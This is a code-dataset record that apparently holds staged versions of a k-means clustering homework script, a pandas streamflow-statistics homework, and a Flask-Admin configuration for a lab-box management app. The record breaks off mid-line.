wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)\n WCSS_array = np.append(WCSS_array, wcss)\nKMeans_array = np.arange(2, 11, 1)\nplt.figure()\nplt.plot(KMeans_array, WCSS_array)\nplt.xlabel('Number of Clusters')\nplt.ylabel('within-cluster sums of squares (WCSS)')\nplt.title('Strategy2 - Run 2: Elbow Chart to identify optimum cluster number')\nplt.show()\nprint('\\nProgram Ended :', time.asctime())\n",
"step-5": "\r\n# Project Overview\r\n# Implement the k-means algorithm and apply your implementation on the given dataset,\r\n# which contains a set of 2-D points.\r\n\r\n# Import Libraries\r\nimport scipy.io\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport random\r\nimport numpy as np\r\nimport time\r\nprint(\"\\nProgram Started :\",time.asctime())\r\n# Function to assign data to clusters using minimum euclidean distance to centroids.\r\n# Inout: Data and Centroids\r\n# Output: Assigned Clusters\r\ndef assign(data,Centroids):\r\n\r\n EuclideanDistance = np.array([]).reshape(m, 0)\r\n for k in range(K):\r\n dist = np.sum((data - Centroids[:, k]) ** 2, axis=1)\r\n EuclideanDistance = np.c_[EuclideanDistance, dist]\r\n Clusters = np.argmin(EuclideanDistance, axis=1) + 1\r\n\r\n return(Clusters)\r\n\r\n# Function to map clusters and the respective data points\r\n# Input: data and number of clusters\r\n# Output: Map Cluster to Data Points\r\ndef map_cluster_data(data, K):\r\n clusterDataMap = {}\r\n for k in range(K):\r\n clusterDataMap[k + 1] = np.array([]).reshape(2, 0)\r\n\r\n for i in range(m):\r\n clusterDataMap[clusters[i]] = np.c_[clusterDataMap[clusters[i]], data.iloc[i]]\r\n\r\n for k in range(K):\r\n clusterDataMap[k + 1] = clusterDataMap[k + 1].T\r\n\r\n return(clusterDataMap)\r\n\r\n# Function to calculate centroid\r\n# Input: Map with cluster and Data Points and Centroids\r\n# Output: New centroids which are calculated from the data mapping of clusters\r\ndef centroid(clusterDataMap,Centroids):\r\n\r\n for k in range(K):\r\n Centroids[:, k] = np.mean(clusterDataMap[k + 1], axis=0)\r\n\r\n return(Centroids)\r\n\r\n# Strategy 1 - Cluster Initialization\r\n# Function to initialize cluster centroids randomly\r\n# Input: Data and Number of Clusters\r\n# Output: Centroids\r\ndef initialize_centroids(data, K):\r\n Centroids = np.array([]).reshape(data.shape[1], 0)\r\n for i in range(K):\r\n randIndex = random.randint(0, data.shape[0] - 1)\r\n Centroids = np.c_[Centroids, data.iloc[randIndex]]\r\n return(Centroids)\r\n\r\n# Strategy 2 - Cluster Initialization\r\n# Function to initialize cluster centroids randomly\r\n# Input: Data and Number of Clusters\r\n# Output: Centroids\r\ndef initialize_centroids_strategy2(data, K):\r\n Centroids = np.array([]).reshape(data.shape[1], 0)\r\n for i in range(K):\r\n if i ==0:\r\n rand = random.randint(0, data.shape[0] - 1)\r\n Centroids = np.c_[Centroids, data.iloc[rand]]\r\n # centroidIndexes.append(rand)\r\n data=data.drop(data.index[rand])\r\n else:\r\n centroidMean = np.mean(Centroids,axis=1)\r\n index = np.argmax(np.sqrt(np.sum((data - centroidMean) ** 2, axis=1)), axis=1)\r\n # centroidIndexes.append(index)\r\n Centroids = np.c_[Centroids, data.iloc[index]]\r\n data = data.drop(data.index[index])\r\n return(Centroids)\r\n\r\n# Read Data\r\nNumpyfile= scipy.io.loadmat(\"C:\\\\Projects\\\\MCS\\\\CSE575\\\\Project 2 - KMeans\\\\data.mat\")\r\ndata = pd.DataFrame(Numpyfile['AllSamples'])\r\ndata.columns=['x1','x2']\r\nm = data.shape[0]\r\nn = data.shape[1]\r\n\r\n# Initialize Prameters\r\nn_iter = 50\r\n\r\n# Initialize plot parameters\r\ncolor=['red','blue','green','cyan','magenta','grey', 'yellow', 'orange', 'black', 'purple']\r\nlabels=['cluster1','cluster2','cluster3','cluster4','cluster5','cluster6', 'cluster7','cluster8','cluster9','cluster10']\r\n\r\n#\r\nprint(\"Strategy 1 : First Iteration\")\r\n# ********* Strategy 1 ************\r\n# Randomly pick the initial centers from the given samples.\r\n\r\n# First run with cluster initiation\r\n# Run K-Means with clusters in the range of 2 - 10\r\nWCSS_array=np.array([])\r\nfor K in range(2,11):\r\n Centroids = initialize_centroids(data, K)\r\n for i in range(n_iter):\r\n clusters = assign(data, Centroids)\r\n clusterDataMap = map_cluster_data(data, K)\r\n Centroids = centroid(clusterDataMap, Centroids)\r\n wcss = 0\r\n # Compute Objective functions\r\n for k in range(K):\r\n wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)\r\n WCSS_array = np.append(WCSS_array, wcss)\r\n\r\n# Plot the objective function\r\nKMeans_array=np.arange(2,11,1)\r\nplt.figure()\r\nplt.plot(KMeans_array,WCSS_array)\r\nplt.xlabel('Number of Clusters')\r\nplt.ylabel('within-cluster sums of squares (WCSS)')\r\nplt.title('Strategy1 - Run 1: Elbow Chart to identify optimum cluster number')\r\nplt.show()\r\n\r\nprint(\"Strategy 1 : Second Iteration\")\r\n# Second run with different cluster initiation\r\n# Run K-Means with clusters in the range of 2 - 10\r\nWCSS_array=np.array([])\r\nfor K in range(2,11):\r\n Centroids = initialize_centroids(data, K)\r\n for i in range(n_iter):\r\n clusters = assign(data, Centroids)\r\n clusterDataMap = map_cluster_data(data, K)\r\n Centroids = centroid(clusterDataMap, Centroids)\r\n wcss = 0\r\n # Compute Objective functions\r\n for k in range(K):\r\n wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)\r\n WCSS_array = np.append(WCSS_array, wcss)\r\n\r\n# Plot the objective function\r\nKMeans_array=np.arange(2,11,1)\r\nplt.figure()\r\nplt.plot(KMeans_array,WCSS_array)\r\nplt.xlabel('Number of Clusters')\r\nplt.ylabel('within-cluster sums of squares (WCSS)')\r\nplt.title('Strategy1 - Run 1: Elbow Chart to identify optimum cluster number')\r\nplt.show()\r\n\r\nprint(\"Strategy 2 : First Iteration\")\r\n# ********** Strategy 2 ************\r\n# Strategy 2: pick the first center randomly; for the i-th center (i>1),\r\n# choose a sample (among all possible samples) such that the average distance of this\r\n# chosen one to all previous (i-1) centers is maximal.\r\n\r\n# First run with cluster initiation\r\n# Run K-Means with clusters in the range of 2 - 10\r\nWCSS_array=np.array([])\r\nfor K in range(2,11):\r\n Centroids = initialize_centroids_strategy2(data, K)\r\n for i in range(n_iter):\r\n clusters = assign(data, Centroids)\r\n clusterDataMap = map_cluster_data(data, K)\r\n Centroids = centroid(clusterDataMap, Centroids)\r\n wcss = 0\r\n for k in range(K):\r\n wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)\r\n WCSS_array = np.append(WCSS_array, wcss)\r\n\r\n# Plot the objective function: Strategy 2 - First initialization\r\nKMeans_array=np.arange(2,11,1)\r\nplt.figure()\r\nplt.plot(KMeans_array,WCSS_array)\r\nplt.xlabel('Number of Clusters')\r\nplt.ylabel('within-cluster sums of squares (WCSS)')\r\nplt.title('Strategy2 - Run 1: Elbow Chart to identify optimum cluster number')\r\nplt.show()\r\n\r\nprint(\"Strategy 2 : Second Iteration\")\r\n# Second run with different cluster initiation\r\n# Run K-Means with clusters in the range of 2 - 10\r\nWCSS_array=np.array([])\r\nfor K in range(2,11):\r\n Centroids = initialize_centroids_strategy2(data, K)\r\n for i in range(n_iter):\r\n clusters = assign(data, Centroids)\r\n clusterDataMap = map_cluster_data(data, K)\r\n Centroids = centroid(clusterDataMap, Centroids)\r\n wcss = 0\r\n for k in range(K):\r\n wcss += np.sum((clusterDataMap[k + 1] - Centroids[:, k]) ** 2)\r\n WCSS_array = np.append(WCSS_array, wcss)\r\n\r\n# Plot the objective function: Strategy 2 - First initialization\r\nKMeans_array=np.arange(2,11,1)\r\nplt.figure()\r\nplt.plot(KMeans_array,WCSS_array)\r\nplt.xlabel('Number of Clusters')\r\nplt.ylabel('within-cluster sums of squares (WCSS)')\r\nplt.title('Strategy2 - Run 2: Elbow Chart to identify optimum cluster number')\r\nplt.show()\r\n\r\nprint(\"\\nProgram Ended :\",time.asctime())",
"step-ids": [
3,
5,
6,
7,
9
]
}
|
[
3,
5,
6,
7,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(os.getcwd())
print(filepath)
<|reserved_special_token_0|>
print(data.tail(14))
print(data.tail(14).describe())
print(data.tail(7).describe())
<|reserved_special_token_0|>
print(data_2019['flow'].describe())
print(data_2019.groupby(['month'])[['flow']].describe())
print(data.info())
print(data['flow'].describe())
print(data.groupby(['month'])[['flow']].describe())
print(data.sort_values(by='flow', ascending=True).tail())
print(data.sort_values(by='flow', ascending=True).head())
for i in range(1, 13):
month_data = data[data['month'] == i]
print(month_data.nlargest(1, ['flow']))
for i in range(1, 13):
month_data = data[data['month'] == i]
print(month_data.nsmallest(1, ['flow']))
<|reserved_special_token_0|>
pd.set_option('display.max_rows', None)
print(data_10percent['datetime'])
<|reserved_special_token_1|>
<|reserved_special_token_0|>
filename = 'streamflow_week5.txt'
filepath = os.path.join('../data', filename)
print(os.getcwd())
print(filepath)
data = pd.read_table(filepath, sep='\t', skiprows=30, names=['agency_cd',
'site_no', 'datetime', 'flow', 'code'])
data[['year', 'month', 'day']] = data['datetime'].str.split('-', expand=True)
data['year'] = data['year'].astype(int)
data['month'] = data['month'].astype(int)
data['day'] = data['day'].astype(int)
print(data.tail(14))
print(data.tail(14).describe())
print(data.tail(7).describe())
data_2019 = data[data['year'] == 2019]
print(data_2019['flow'].describe())
print(data_2019.groupby(['month'])[['flow']].describe())
print(data.info())
print(data['flow'].describe())
print(data.groupby(['month'])[['flow']].describe())
print(data.sort_values(by='flow', ascending=True).tail())
print(data.sort_values(by='flow', ascending=True).head())
for i in range(1, 13):
month_data = data[data['month'] == i]
print(month_data.nlargest(1, ['flow']))
for i in range(1, 13):
month_data = data[data['month'] == i]
print(month_data.nsmallest(1, ['flow']))
forecast = 58.4
data_10percent = data[(data['flow'] >= 0.9 * forecast) & (data['flow'] <=
1.1 * forecast)]
pd.set_option('display.max_rows', None)
print(data_10percent['datetime'])
<|reserved_special_token_1|>
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
filename = 'streamflow_week5.txt'
filepath = os.path.join('../data', filename)
print(os.getcwd())
print(filepath)
data = pd.read_table(filepath, sep='\t', skiprows=30, names=['agency_cd',
'site_no', 'datetime', 'flow', 'code'])
data[['year', 'month', 'day']] = data['datetime'].str.split('-', expand=True)
data['year'] = data['year'].astype(int)
data['month'] = data['month'].astype(int)
data['day'] = data['day'].astype(int)
print(data.tail(14))
print(data.tail(14).describe())
print(data.tail(7).describe())
data_2019 = data[data['year'] == 2019]
print(data_2019['flow'].describe())
print(data_2019.groupby(['month'])[['flow']].describe())
print(data.info())
print(data['flow'].describe())
print(data.groupby(['month'])[['flow']].describe())
print(data.sort_values(by='flow', ascending=True).tail())
print(data.sort_values(by='flow', ascending=True).head())
for i in range(1, 13):
month_data = data[data['month'] == i]
print(month_data.nlargest(1, ['flow']))
for i in range(1, 13):
month_data = data[data['month'] == i]
print(month_data.nsmallest(1, ['flow']))
forecast = 58.4
data_10percent = data[(data['flow'] >= 0.9 * forecast) & (data['flow'] <=
1.1 * forecast)]
pd.set_option('display.max_rows', None)
print(data_10percent['datetime'])
<|reserved_special_token_1|>
# Example solution for HW 5
# %%
# Import the modules we will use
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# %%
# ** MODIFY **
# Set the file name and path to where you have stored the data
filename = 'streamflow_week5.txt' #modified filename
filepath = os.path.join('../data', filename) #modified path to look one directory up
print(os.getcwd())
print(filepath)
#filepath = '../Assignments/Solutions/data/streamflow_week5.txt'
# %%
#Read the data into a pandas dataframe
data=pd.read_table(filepath, sep = '\t', skiprows=30,
names=['agency_cd', 'site_no', 'datetime', 'flow', 'code']
)
# Expand the dates to year month day
data[["year", "month", "day"]] =data["datetime"].str.split("-", expand=True)
data['year'] = data['year'].astype(int)
data['month'] = data['month'].astype(int)
data['day'] = data['day'].astype(int)
# %%
# Sorry no more helpers past here this week, you are on your own now :)
# Hints - you will need the functions: describe, info, groupby, sort, head and tail.
# %% Start of Mekha's code
# 1 and 2 week forecast
# Look at most recent 2 weeks of data ending 9/26
print(data.tail(14))
# Calculate avg of last two week's flow
print(data.tail(14).describe())
# Calculate avg of last week's flow
print(data.tail(7).describe())
# Look at stats for 2019 because from my previous analysis, I know it is a smiliarly dry year
data_2019 = data[data['year']==2019]
print(data_2019['flow'].describe())
# Look at stats for 2019 by month
print(data_2019.groupby(['month'])[['flow']].describe())
# %% 1. Provide a summary of the data frames properties.
# What are the column names?
# What is its index?
# What data types do each of the columns have?
print(data.info())
# %% 2.Provide a summary of the flow column including the min, mean, max, standard
# deviation and quartiles.
print(data['flow'].describe())
# %% 3.Provide the same information but on a monthly basis. (Note: you should be
# able to do this with one or two lines of code)
print(data.groupby(['month'])[['flow']].describe())
# %% 4.Provide a table with the 5 highest and 5 lowest flow values for the period
# of record. Include the date, month and flow values in your summary.
# 5 highest
print(data.sort_values(by="flow",ascending=True).tail())
# 5 lowest
print(data.sort_values(by="flow",ascending=True).head())
# %% 5.Find the highest and lowest flow values for every month of the year (i.e. you
# will find 12 maxes and 12 mins) and report back what year these occurred in.
# highest value for each month
for i in range(1,13):
month_data = data[data['month']==i]
print(month_data.nlargest(1,['flow']))
# lowest value for each month
for i in range(1,13):
month_data = data[data['month']==i]
print(month_data.nsmallest(1,['flow']))
# %% 6.Provide a list of historical dates with flows that are within 10% of your week 1
# forecast value. If there are none than increase the %10 window until you have at
# least one other value and report the date and the new window you used
forecast = 58.4
data_10percent = data[(data['flow'] >= (0.9*forecast)) & (data['flow'] <= (1.1*forecast))]
pd.set_option('display.max_rows', None)
print(data_10percent['datetime'])
# %%
|
flexible
|
{
"blob_id": "5024db0538f0022b84c203882df9c35979ba978a",
"index": 4571,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(os.getcwd())\nprint(filepath)\n<mask token>\nprint(data.tail(14))\nprint(data.tail(14).describe())\nprint(data.tail(7).describe())\n<mask token>\nprint(data_2019['flow'].describe())\nprint(data_2019.groupby(['month'])[['flow']].describe())\nprint(data.info())\nprint(data['flow'].describe())\nprint(data.groupby(['month'])[['flow']].describe())\nprint(data.sort_values(by='flow', ascending=True).tail())\nprint(data.sort_values(by='flow', ascending=True).head())\nfor i in range(1, 13):\n month_data = data[data['month'] == i]\n print(month_data.nlargest(1, ['flow']))\nfor i in range(1, 13):\n month_data = data[data['month'] == i]\n print(month_data.nsmallest(1, ['flow']))\n<mask token>\npd.set_option('display.max_rows', None)\nprint(data_10percent['datetime'])\n",
"step-3": "<mask token>\nfilename = 'streamflow_week5.txt'\nfilepath = os.path.join('../data', filename)\nprint(os.getcwd())\nprint(filepath)\ndata = pd.read_table(filepath, sep='\\t', skiprows=30, names=['agency_cd',\n 'site_no', 'datetime', 'flow', 'code'])\ndata[['year', 'month', 'day']] = data['datetime'].str.split('-', expand=True)\ndata['year'] = data['year'].astype(int)\ndata['month'] = data['month'].astype(int)\ndata['day'] = data['day'].astype(int)\nprint(data.tail(14))\nprint(data.tail(14).describe())\nprint(data.tail(7).describe())\ndata_2019 = data[data['year'] == 2019]\nprint(data_2019['flow'].describe())\nprint(data_2019.groupby(['month'])[['flow']].describe())\nprint(data.info())\nprint(data['flow'].describe())\nprint(data.groupby(['month'])[['flow']].describe())\nprint(data.sort_values(by='flow', ascending=True).tail())\nprint(data.sort_values(by='flow', ascending=True).head())\nfor i in range(1, 13):\n month_data = data[data['month'] == i]\n print(month_data.nlargest(1, ['flow']))\nfor i in range(1, 13):\n month_data = data[data['month'] == i]\n print(month_data.nsmallest(1, ['flow']))\nforecast = 58.4\ndata_10percent = data[(data['flow'] >= 0.9 * forecast) & (data['flow'] <= \n 1.1 * forecast)]\npd.set_option('display.max_rows', None)\nprint(data_10percent['datetime'])\n",
"step-4": "import os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfilename = 'streamflow_week5.txt'\nfilepath = os.path.join('../data', filename)\nprint(os.getcwd())\nprint(filepath)\ndata = pd.read_table(filepath, sep='\\t', skiprows=30, names=['agency_cd',\n 'site_no', 'datetime', 'flow', 'code'])\ndata[['year', 'month', 'day']] = data['datetime'].str.split('-', expand=True)\ndata['year'] = data['year'].astype(int)\ndata['month'] = data['month'].astype(int)\ndata['day'] = data['day'].astype(int)\nprint(data.tail(14))\nprint(data.tail(14).describe())\nprint(data.tail(7).describe())\ndata_2019 = data[data['year'] == 2019]\nprint(data_2019['flow'].describe())\nprint(data_2019.groupby(['month'])[['flow']].describe())\nprint(data.info())\nprint(data['flow'].describe())\nprint(data.groupby(['month'])[['flow']].describe())\nprint(data.sort_values(by='flow', ascending=True).tail())\nprint(data.sort_values(by='flow', ascending=True).head())\nfor i in range(1, 13):\n month_data = data[data['month'] == i]\n print(month_data.nlargest(1, ['flow']))\nfor i in range(1, 13):\n month_data = data[data['month'] == i]\n print(month_data.nsmallest(1, ['flow']))\nforecast = 58.4\ndata_10percent = data[(data['flow'] >= 0.9 * forecast) & (data['flow'] <= \n 1.1 * forecast)]\npd.set_option('display.max_rows', None)\nprint(data_10percent['datetime'])\n",
"step-5": "# Example solution for HW 5\n\n# %%\n# Import the modules we will use\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# %%\n# ** MODIFY **\n# Set the file name and path to where you have stored the data\nfilename = 'streamflow_week5.txt' #modified filename\nfilepath = os.path.join('../data', filename) #modified path to look one directory up\nprint(os.getcwd())\nprint(filepath)\n\n#filepath = '../Assignments/Solutions/data/streamflow_week5.txt'\n\n# %%\n#Read the data into a pandas dataframe\ndata=pd.read_table(filepath, sep = '\\t', skiprows=30,\n names=['agency_cd', 'site_no', 'datetime', 'flow', 'code']\n )\n\n# Expand the dates to year month day\ndata[[\"year\", \"month\", \"day\"]] =data[\"datetime\"].str.split(\"-\", expand=True)\ndata['year'] = data['year'].astype(int)\ndata['month'] = data['month'].astype(int)\ndata['day'] = data['day'].astype(int)\n\n# %%\n# Sorry no more helpers past here this week, you are on your own now :) \n# Hints - you will need the functions: describe, info, groupby, sort, head and tail.\n\n# %% Start of Mekha's code\n\n# 1 and 2 week forecast\n\n# Look at most recent 2 weeks of data ending 9/26\nprint(data.tail(14))\n\n# Calculate avg of last two week's flow\nprint(data.tail(14).describe())\n\n# Calculate avg of last week's flow\nprint(data.tail(7).describe())\n\n# Look at stats for 2019 because from my previous analysis, I know it is a smiliarly dry year\ndata_2019 = data[data['year']==2019]\nprint(data_2019['flow'].describe())\n\n# Look at stats for 2019 by month\nprint(data_2019.groupby(['month'])[['flow']].describe())\n\n# %% 1. Provide a summary of the data frames properties.\n# What are the column names?\n# What is its index?\n# What data types do each of the columns have?\nprint(data.info())\n\n# %% 2.Provide a summary of the flow column including the min, mean, max, standard \n# deviation and quartiles.\nprint(data['flow'].describe())\n\n# %% 3.Provide the same information but on a monthly basis. (Note: you should be \n# able to do this with one or two lines of code)\nprint(data.groupby(['month'])[['flow']].describe())\n\n# %% 4.Provide a table with the 5 highest and 5 lowest flow values for the period \n# of record. Include the date, month and flow values in your summary.\n\n# 5 highest\nprint(data.sort_values(by=\"flow\",ascending=True).tail())\n\n# 5 lowest\nprint(data.sort_values(by=\"flow\",ascending=True).head())\n\n\n# %% 5.Find the highest and lowest flow values for every month of the year (i.e. you \n# will find 12 maxes and 12 mins) and report back what year these occurred in.\n\n# highest value for each month\nfor i in range(1,13):\n month_data = data[data['month']==i]\n print(month_data.nlargest(1,['flow']))\n\n# lowest value for each month\nfor i in range(1,13):\n month_data = data[data['month']==i]\n print(month_data.nsmallest(1,['flow']))\n\n# %% 6.Provide a list of historical dates with flows that are within 10% of your week 1 \n# forecast value. If there are none than increase the %10 window until you have at \n# least one other value and report the date and the new window you used\n\nforecast = 58.4\ndata_10percent = data[(data['flow'] >= (0.9*forecast)) & (data['flow'] <= (1.1*forecast))]\npd.set_option('display.max_rows', None)\nprint(data_10percent['datetime'])\n\n# %%\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class UserModel(AuthModel):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def on_model_change(self, form, model, is_created):
if is_created:
logger.warning('[Admin] Create for ' + model.email)
sendUserMail(model, 'register')
return
if not model.password:
logger.warning('[Admin] Reset Password and sent to ' + model.email)
sendUserMail(model, 'forgetpass')
return
if not model.password.startswith('$6$'):
logger.warning('[Admin] Reset Password ' + model.email)
model.setPassword(model.password)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class AuthModel(ModelView):
def is_accessible(self):
if not flask_login.current_user.is_authenticated:
abort(400, 'Permission Denied')
return False
now_user = flask_login.current_user
if now_user.groupid != 0:
abort(400, 'Permission Denied')
return False
logger.warning('[Admin] ' + now_user.name)
return True
class UserModel(AuthModel):
column_list = ['id', 'name', 'disable', 'groupid', 'email', 'passtime',
'quota', 'use_quota', 'password']
column_descriptions = {'password':
'Password(Left empty for forgot or newly create, It will send email to whom)'
, 'passtime': 'The time for manually changing password(0 = never)'}
def on_model_change(self, form, model, is_created):
if is_created:
logger.warning('[Admin] Create for ' + model.email)
sendUserMail(model, 'register')
return
if not model.password:
logger.warning('[Admin] Reset Password and sent to ' + model.email)
sendUserMail(model, 'forgetpass')
return
if not model.password.startswith('$6$'):
logger.warning('[Admin] Reset Password ' + model.email)
model.setPassword(model.password)
<|reserved_special_token_0|>
admin.add_view(AuthModel(Box, boxdb.session))
admin.add_view(AuthModel(Image, boxdb.session))
admin.add_view(UserModel(User, userdb.session))
admin.add_view(AuthModel(BoxQueue, boxdb.session))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
logger = logging.getLogger('labboxmain')
class AuthModel(ModelView):
def is_accessible(self):
if not flask_login.current_user.is_authenticated:
abort(400, 'Permission Denied')
return False
now_user = flask_login.current_user
if now_user.groupid != 0:
abort(400, 'Permission Denied')
return False
logger.warning('[Admin] ' + now_user.name)
return True
class UserModel(AuthModel):
column_list = ['id', 'name', 'disable', 'groupid', 'email', 'passtime',
'quota', 'use_quota', 'password']
column_descriptions = {'password':
'Password(Left empty for forgot or newly create, It will send email to whom)'
, 'passtime': 'The time for manually changing password(0 = never)'}
def on_model_change(self, form, model, is_created):
if is_created:
logger.warning('[Admin] Create for ' + model.email)
sendUserMail(model, 'register')
return
if not model.password:
logger.warning('[Admin] Reset Password and sent to ' + model.email)
sendUserMail(model, 'forgetpass')
return
if not model.password.startswith('$6$'):
logger.warning('[Admin] Reset Password ' + model.email)
model.setPassword(model.password)
admin = Admin()
admin.add_view(AuthModel(Box, boxdb.session))
admin.add_view(AuthModel(Image, boxdb.session))
admin.add_view(UserModel(User, userdb.session))
admin.add_view(AuthModel(BoxQueue, boxdb.session))
<|reserved_special_token_1|>
from flask_admin.contrib.sqla import ModelView
from flask_admin import Admin
from flask import abort
import flask_login
import logging
from .models import User, sendUserMail, db as userdb
from .box_models import Box, Image, db as boxdb
from .box_queue import BoxQueue
logger = logging.getLogger('labboxmain')
class AuthModel(ModelView):
def is_accessible(self):
if not flask_login.current_user.is_authenticated:
abort(400, 'Permission Denied')
return False
now_user = flask_login.current_user
if now_user.groupid != 0:
abort(400, 'Permission Denied')
return False
logger.warning('[Admin] ' + now_user.name)
return True
class UserModel(AuthModel):
column_list = ['id', 'name', 'disable', 'groupid', 'email', 'passtime',
'quota', 'use_quota', 'password']
column_descriptions = {'password':
'Password(Left empty for forgot or newly create, It will send email to whom)'
, 'passtime': 'The time for manually changing password(0 = never)'}
def on_model_change(self, form, model, is_created):
if is_created:
logger.warning('[Admin] Create for ' + model.email)
sendUserMail(model, 'register')
return
if not model.password:
logger.warning('[Admin] Reset Password and sent to ' + model.email)
sendUserMail(model, 'forgetpass')
return
if not model.password.startswith('$6$'):
logger.warning('[Admin] Reset Password ' + model.email)
model.setPassword(model.password)
admin = Admin()
admin.add_view(AuthModel(Box, boxdb.session))
admin.add_view(AuthModel(Image, boxdb.session))
admin.add_view(UserModel(User, userdb.session))
admin.add_view(AuthModel(BoxQueue, boxdb.session))
<|reserved_special_token_1|>
from flask_admin.contrib.sqla import ModelView
from flask_admin import Admin
from flask import abort
import flask_login
import logging
from .models import User, sendUserMail, db as userdb
from .box_models import Box, Image, db as boxdb
from .box_queue import BoxQueue
logger = logging.getLogger('labboxmain')
class AuthModel(ModelView):
def is_accessible(self):
if not flask_login.current_user.is_authenticated:
abort(400, "Permission Denied")
return False
now_user = flask_login.current_user
if now_user.groupid != 0:
abort(400, "Permission Denied")
return False
logger.warning('[Admin] ' + now_user.name)
return True
class UserModel(AuthModel):
column_list = ["id", "name", "disable", "groupid", "email", "passtime", "quota", "use_quota", "password"]
column_descriptions = {
'password': "Password(Left empty for forgot or newly create, It will send email to whom)",
'passtime': "The time for manually changing password(0 = never)"
}
def on_model_change(self, form, model, is_created):
if is_created:
logger.warning("[Admin] Create for " + model.email)
sendUserMail(model, "register")
return
if not model.password:
logger.warning("[Admin] Reset Password and sent to " + model.email)
sendUserMail(model, "forgetpass")
return
if not model.password.startswith("$6$"):
logger.warning("[Admin] Reset Password " + model.email)
model.setPassword(model.password)
admin = Admin()
admin.add_view(AuthModel(Box, boxdb.session))
admin.add_view(AuthModel(Image, boxdb.session))
admin.add_view(UserModel(User, userdb.session))
admin.add_view(AuthModel(BoxQueue, boxdb.session))
|
flexible
|
{
"blob_id": "3f86227afd60be560ac3d4ce2bee1f6cf74a744d",
"index": 3509,
"step-1": "<mask token>\n\n\nclass UserModel(AuthModel):\n <mask token>\n <mask token>\n\n def on_model_change(self, form, model, is_created):\n if is_created:\n logger.warning('[Admin] Create for ' + model.email)\n sendUserMail(model, 'register')\n return\n if not model.password:\n logger.warning('[Admin] Reset Password and sent to ' + model.email)\n sendUserMail(model, 'forgetpass')\n return\n if not model.password.startswith('$6$'):\n logger.warning('[Admin] Reset Password ' + model.email)\n model.setPassword(model.password)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass AuthModel(ModelView):\n\n def is_accessible(self):\n if not flask_login.current_user.is_authenticated:\n abort(400, 'Permission Denied')\n return False\n now_user = flask_login.current_user\n if now_user.groupid != 0:\n abort(400, 'Permission Denied')\n return False\n logger.warning('[Admin] ' + now_user.name)\n return True\n\n\nclass UserModel(AuthModel):\n column_list = ['id', 'name', 'disable', 'groupid', 'email', 'passtime',\n 'quota', 'use_quota', 'password']\n column_descriptions = {'password':\n 'Password(Left empty for forgot or newly create, It will send email to whom)'\n , 'passtime': 'The time for manually changing password(0 = never)'}\n\n def on_model_change(self, form, model, is_created):\n if is_created:\n logger.warning('[Admin] Create for ' + model.email)\n sendUserMail(model, 'register')\n return\n if not model.password:\n logger.warning('[Admin] Reset Password and sent to ' + model.email)\n sendUserMail(model, 'forgetpass')\n return\n if not model.password.startswith('$6$'):\n logger.warning('[Admin] Reset Password ' + model.email)\n model.setPassword(model.password)\n\n\n<mask token>\nadmin.add_view(AuthModel(Box, boxdb.session))\nadmin.add_view(AuthModel(Image, boxdb.session))\nadmin.add_view(UserModel(User, userdb.session))\nadmin.add_view(AuthModel(BoxQueue, boxdb.session))\n",
"step-3": "<mask token>\nlogger = logging.getLogger('labboxmain')\n\n\nclass AuthModel(ModelView):\n\n def is_accessible(self):\n if not flask_login.current_user.is_authenticated:\n abort(400, 'Permission Denied')\n return False\n now_user = flask_login.current_user\n if now_user.groupid != 0:\n abort(400, 'Permission Denied')\n return False\n logger.warning('[Admin] ' + now_user.name)\n return True\n\n\nclass UserModel(AuthModel):\n column_list = ['id', 'name', 'disable', 'groupid', 'email', 'passtime',\n 'quota', 'use_quota', 'password']\n column_descriptions = {'password':\n 'Password(Left empty for forgot or newly create, It will send email to whom)'\n , 'passtime': 'The time for manually changing password(0 = never)'}\n\n def on_model_change(self, form, model, is_created):\n if is_created:\n logger.warning('[Admin] Create for ' + model.email)\n sendUserMail(model, 'register')\n return\n if not model.password:\n logger.warning('[Admin] Reset Password and sent to ' + model.email)\n sendUserMail(model, 'forgetpass')\n return\n if not model.password.startswith('$6$'):\n logger.warning('[Admin] Reset Password ' + model.email)\n model.setPassword(model.password)\n\n\nadmin = Admin()\nadmin.add_view(AuthModel(Box, boxdb.session))\nadmin.add_view(AuthModel(Image, boxdb.session))\nadmin.add_view(UserModel(User, userdb.session))\nadmin.add_view(AuthModel(BoxQueue, boxdb.session))\n",
"step-4": "from flask_admin.contrib.sqla import ModelView\nfrom flask_admin import Admin\nfrom flask import abort\nimport flask_login\nimport logging\nfrom .models import User, sendUserMail, db as userdb\nfrom .box_models import Box, Image, db as boxdb\nfrom .box_queue import BoxQueue\nlogger = logging.getLogger('labboxmain')\n\n\nclass AuthModel(ModelView):\n\n def is_accessible(self):\n if not flask_login.current_user.is_authenticated:\n abort(400, 'Permission Denied')\n return False\n now_user = flask_login.current_user\n if now_user.groupid != 0:\n abort(400, 'Permission Denied')\n return False\n logger.warning('[Admin] ' + now_user.name)\n return True\n\n\nclass UserModel(AuthModel):\n column_list = ['id', 'name', 'disable', 'groupid', 'email', 'passtime',\n 'quota', 'use_quota', 'password']\n column_descriptions = {'password':\n 'Password(Left empty for forgot or newly create, It will send email to whom)'\n , 'passtime': 'The time for manually changing password(0 = never)'}\n\n def on_model_change(self, form, model, is_created):\n if is_created:\n logger.warning('[Admin] Create for ' + model.email)\n sendUserMail(model, 'register')\n return\n if not model.password:\n logger.warning('[Admin] Reset Password and sent to ' + model.email)\n sendUserMail(model, 'forgetpass')\n return\n if not model.password.startswith('$6$'):\n logger.warning('[Admin] Reset Password ' + model.email)\n model.setPassword(model.password)\n\n\nadmin = 